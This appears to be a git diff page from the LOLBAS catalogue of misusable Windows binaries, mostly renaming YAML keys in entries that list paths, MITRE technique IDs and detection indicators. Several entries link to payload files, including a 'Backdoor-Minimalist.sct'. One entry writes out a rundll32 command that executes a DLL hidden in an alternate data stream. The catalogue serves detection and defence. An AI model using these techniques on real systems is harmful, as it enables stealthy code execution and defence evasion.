Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\mshta.exe
|
||||
- Path: C:\Windows\SysWOW64\mshta.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct
|
||||
Detection:
|
||||
- IOC: mshta.exe executing raw or obfuscated script within the command-line
|
||||
|
@ -36,10 +36,10 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\msiexec.exe
|
||||
- Path: C:\Windows\SysWOW64\msiexec.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: msiexec.exe getting files from Internet
|
||||
|
@ -12,10 +12,10 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\odbcconf.exe
|
||||
- Path: C:\Windows\SysWOW64\odbcconf.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/file.rsp
|
||||
Detection:
|
||||
- IOC:
|
||||
|
@ -28,9 +28,9 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\pcalua.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
@ -12,9 +12,9 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\pcwrun.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
@ -12,10 +12,10 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\Presentationhost.exe
|
||||
- Path: C:\Windows\SysWOW64\Presentationhost.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
@ -28,10 +28,10 @@ Commands:
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\print.exe
|
||||
- Path: C:\Windows\SysWOW64\print.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Print.exe getting files from internet
|
||||
|
@ -12,10 +12,10 @@ Commands:
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\reg.exe
|
||||
- Path: C:\Windows\SysWOW64\reg.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: reg.exe writing to an ADS
|
||||
|
@ -20,12 +20,12 @@ Commands:
|
||||
MitreID: T1121
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1121
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: regasm.exe executing dll file
|
||||
|
@ -20,10 +20,10 @@ Commands:
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\regedit.exe
|
||||
- Path: C:\Windows\SysWOW64\regedit.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: regedit.exe reading and writing to alternate data stream
|
||||
|
@ -12,10 +12,10 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\Register-cimprovider.exe
|
||||
- Path: C:\Windows\SysWOW64\Register-cimprovider.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
@ -20,10 +20,10 @@ Commands:
|
||||
MitreID: T1121
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1121
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\regsvcs.exe
|
||||
- Path: C:\Windows\SysWOW64\regsvcs.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
@ -36,10 +36,10 @@ Commands:
|
||||
MitreID: T1117
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1117
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\regsvr32.exe
|
||||
- Path: C:\Windows\SysWOW64\regsvr32.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: regsvr32.exe getting files from Internet
|
||||
|
@ -20,10 +20,10 @@ Commands:
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\replace.exe
|
||||
- Path: C:\Windows\SysWOW64\replace.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Replace.exe getting files from remote server
|
||||
|
@ -12,10 +12,10 @@ Commands:
|
||||
MitreID: T1003
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1003
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\rpcping.exe
|
||||
- Path: C:\Windows\SysWOW64\rpcping.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
@ -47,7 +47,7 @@ Commands:
|
||||
- Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain
|
||||
Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).
|
||||
Usecase: Execute code from alternate data stream
|
||||
Category: Alternate data streams
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
@ -60,10 +60,10 @@ Commands:
|
||||
MitreID:
|
||||
MitreLink:
|
||||
OperatingSystem: Windows 10 (and likely previous versions)
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\rundll32.exe
|
||||
- Path: C:\Windows\SysWOW64\rundll32.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
@ -12,10 +12,10 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\runonce.exe
|
||||
- Path: C:\Windows\SysWOW64\runonce.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\YOURKEY
|
||||
|
@ -12,10 +12,10 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe
|
||||
- Path: CC:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Event 4014 - Powershell logging
|
||||
|
@ -12,10 +12,10 @@ Commands:
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\sc.exe
|
||||
- Path: C:\Windows\SysWOW64\sc.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Services that gets created
|
||||
|
@ -12,10 +12,10 @@ Commands:
|
||||
MitreID: T1053
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1053
|
||||
OperatingSystem: Windows
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\schtasks.exe
|
||||
- Path: c:\windows\syswow64\schtasks.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Services that gets created
|
||||
|
@ -20,10 +20,10 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\scriptrunner.exe
|
||||
- Path: C:\Windows\SysWOW64\scriptrunner.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Scriptrunner.exe should not be in use unless App-v is deployed
|
||||
|
@ -12,10 +12,10 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\SyncAppvPublishingServer.exe
|
||||
- Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: SyncAppvPublishingServer.exe should never be in use unless App-V is deployed
|
||||
|
@ -12,10 +12,10 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\verclsid.exe
|
||||
- Path: C:\Windows\SysWOW64\verclsid.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
@ -12,10 +12,10 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\Windows Mail\wab.exe
|
||||
- Path: C:\Program Files (x86)\Windows Mail\wab.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: WAB.exe should normally never be used
|
||||
|
@ -68,10 +68,10 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\wmic.exe
|
||||
- Path: C:\Windows\SysWOW64\wmic.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Wmic getting scripts from remote system
|
||||
|
@ -12,10 +12,10 @@ Commands:
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\wscript.exe
|
||||
- Path: C:\Windows\SysWOW64\wscript.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Wscript.exe executing code from alternate data streams
|
||||
|
@ -20,10 +20,10 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\xwizard.exe
|
||||
- Path: C:\Windows\SysWOW64\xwizard.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
@ -38,5 +38,5 @@ Acknowledgement:
|
||||
- Person: Nick Tyrer
|
||||
Handle: '@NickTyrer'
|
||||
- Person: harr0ey
|
||||
Handle: @harr0ey
|
||||
Handle: '@harr0ey'
|
||||
---
|
||||
|
@ -42,10 +42,10 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1085
|
||||
MItreLink: https://attack.mitre.org/wiki/Technique/T1085
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\advpack.dll
|
||||
- Path: c:\windows\syswow64\advpack.dll
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Advpack.inf
|
||||
- Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Advpack_calc.sct
|
||||
Detection:
|
||||
|
@ -42,10 +42,10 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1085
|
||||
MItreLink: https://attack.mitre.org/wiki/Technique/T1085
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\ieadvpack.dll
|
||||
- Path: c:\windows\syswow64\ieadvpack.dll
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Ieadvpack.inf
|
||||
- Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Ieadvpack_calc.sct
|
||||
Detection:
|
||||
|
@ -12,10 +12,10 @@ Commands:
|
||||
MitreID: T1085
|
||||
MItreLink: https://attack.mitre.org/wiki/Technique/T1085
|
||||
OperatingSystem: Windows
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\ieframe.dll
|
||||
- Path: c:\windows\syswow64\ieframe.dll
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code: https://gist.githubusercontent.com/bohops/89d7b11fa32062cfe31be9fdb18f050e/raw/1206a613a6621da21e7fd164b80a7ff01c5b64ab/calc.url
|
||||
Detection:
|
||||
- IOC:
|
||||
|
@ -12,10 +12,10 @@ Commands:
|
||||
MitreID: T1085
|
||||
MItreLink: https://attack.mitre.org/wiki/Technique/T1085
|
||||
OperatingSystem: Windows
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\mshtml.dll
|
||||
- Path: c:\windows\syswow64\mshtml.dll
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
@ -12,10 +12,10 @@ Commands:
|
||||
MitreID: T1085
|
||||
MItreLink: https://attack.mitre.org/wiki/Technique/T1085
|
||||
OperatingSystem: Windows
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\pcwutl.dll
|
||||
- Path: c:\windows\syswow64\pcwutl.dll
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
@ -25,3 +25,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Matt harr0ey
|
||||
Handle: '@harr0ey'
|
||||
---
|
@ -20,10 +20,10 @@ Commands:
|
||||
MitreID: T1085
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
|
||||
OperatingSystem: Windows
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\setupapi.dll
|
||||
- Path: c:\windows\syswow64\setupapi.dll
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code: https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf
|
||||
- Code: https://gist.github.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba#file-backdoor-minimalist-sct
|
||||
- Code: https://gist.githubusercontent.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba/raw/6cb52b88bcc929f5555cd302d9ed848b7e407052/Backdoor-Minimalist.sct
|
||||
|
@ -12,10 +12,10 @@ Commands:
|
||||
MitreID: T1085
|
||||
MItreLink: https://attack.mitre.org/wiki/Technique/T1085
|
||||
OperatingSystem: Windows
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\shdocvw.dll
|
||||
- Path: c:\windows\syswow64\shdocvw.dll
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code: https://gist.githubusercontent.com/bohops/89d7b11fa32062cfe31be9fdb18f050e/raw/1206a613a6621da21e7fd164b80a7ff01c5b64ab/calc.url
|
||||
Detection:
|
||||
- IOC:
|
||||
|
@ -26,10 +26,10 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1085
|
||||
MItreLink: https://attack.mitre.org/wiki/Technique/T1085
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\shell32.dll
|
||||
- Path: c:\windows\syswow64\shell32.dll
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
@ -20,10 +20,10 @@ Commands:
|
||||
MitreID: T1085
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
|
||||
OperatingSystem: Windows
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\syssetup.dll
|
||||
- Path: c:\windows\syswow64\syssetup.dll
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code: https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf
|
||||
- Code: https://gist.github.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba#file-backdoor-minimalist-sct
|
||||
- Code: https://gist.github.com/homjxi0e/87b29da0d4f504cb675bb1140a931415
|
||||
|
@ -52,10 +52,10 @@ Commands:
|
||||
MitreID: T1085
|
||||
MItreLink: https://attack.mitre.org/wiki/Technique/T1085
|
||||
OperatingSystem: Windows
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\url.dll
|
||||
- Path: c:\windows\syswow64\url.dll
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
@ -20,10 +20,10 @@ Commands:
|
||||
MitreID: T1085
|
||||
MItreLink: https://attack.mitre.org/wiki/Technique/T1085
|
||||
OperatingSystem: Windows
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\zipfldr.dll
|
||||
- Path: c:\windows\syswow64\zipfldr.dll
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
@ -12,11 +12,11 @@ Commands:
|
||||
MitreID: T1216
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
|
||||
OperatingSystem: Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
|
||||
- Path: C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1
|
||||
- Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
@ -12,11 +12,11 @@ Commands:
|
||||
MitreID: T1216
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
|
||||
OperatingSystem: Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1
|
||||
- Path: C:\Windows\diagnostics\system\Audio\CL_Invocation.ps1
|
||||
- Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Invocation.ps1
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
@ -20,9 +20,9 @@ Commands:
|
||||
MitreID: T1216
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
|
||||
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\manage-bde.wsf
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Manage-bde.wsf should normally not be invoked by a user
|
||||
|
@ -12,10 +12,10 @@ Commands:
|
||||
MitreID: T1216
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
|
||||
OperatingSystem: Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
|
||||
- Path: C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Pubprn_calc.sct
|
||||
Detection:
|
||||
- IOC:
|
||||
|
@ -12,10 +12,10 @@ Commands:
|
||||
MitreID: T1216
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
|
||||
OperatingSystem: Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\slmgr.vbs
|
||||
- Path: C:\Windows\SysWOW64\slmgr.vbs
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr_calc.sct
|
||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr.reg
|
||||
Detection:
|
||||
|
@ -12,9 +12,9 @@ Commands:
|
||||
MitreID: T1216
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
|
||||
OperatingSystem: Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\SyncAppvPublishingServer.vbs
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
@ -36,10 +36,10 @@ Commands:
|
||||
MitreID: T1216
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
|
||||
OperatingSystem: Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\winrm.vbs
|
||||
- Path: C:\Windows\SysWOW64\winrm.vbs
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr.reg
|
||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr_calc.sct
|
||||
Detection:
|
||||
|
@ -12,10 +12,10 @@ Commands:
|
||||
MitreID: T1216
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
|
||||
OperatingSystem: Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: c:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat
|
||||
- Path: c:\Program Files\WindowsPowerShell\Modules\Pester\*\bin\Pester.bat
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
@ -28,10 +28,10 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows 10 w/Office 2016
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\Microsoft Office\root\client\appvlp.exe
|
||||
- Path: C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
@ -52,9 +52,9 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: No fixed path
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
@ -12,10 +12,10 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe
|
||||
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue
Block a user